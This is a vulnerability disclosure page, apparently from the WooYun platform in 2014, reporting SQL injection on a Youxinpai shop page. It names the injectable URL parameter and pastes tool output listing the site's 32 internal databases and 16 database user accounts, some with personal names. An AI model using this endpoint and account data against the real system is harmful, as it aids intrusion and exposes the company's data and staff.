漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-09-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
拉手网专场,看来看去,我擦,没有一家招聘安全岗的~
详细说明:
优信拍
http://shop.youxinpai.com/Detail.aspx?serial=000048 点
available databases [32]:
[*] AuctionResources
[*] AuctionStat
[*] AutoDetectDB
[*] AutoDetectDBNew
[*] BitautoServices
[*] BitAutoUcarCommon
[*] BmwAuction
[*] distribution
[*] iAutosResource
[*] master
[*] model
[*] msdb
[*] OPFramework
[*] ReportServer
[*] ReportServerTempDB
[*] StandardSaleEdition
[*] Tams
[*] TaoCheCarSource
[*] tempdb
[*] Transtar2007
[*] Transtar2008
[*] TranstarAuction2011
[*] Transtarframework
[*] Transtarframework_UcarOldBak
[*] UcarCommon
[*] UcarCommon_En
[*] UcarTransaction
[*] ucvin
[*] UncleLog
[*] VWSalesSys
[*] YXPFramework
[*] YXPLogistics
database management system users [16]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] cactistats
[*] distributor_admin
[*] ducm
[*] fuzhi
[*] sa
[*] to65
[*] tomysql
[*] uxin_write
[*] wangjingjing
[*] wangliang
[*] yechao
[*] zhangpeng
[*] zhangshicong
[*] zhangweiguang
权限十足,不堪一击~ 修复吧
漏洞证明:
如上~
修复方案:
过滤
版权声明:转载请注明来源 爱上平顶山@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝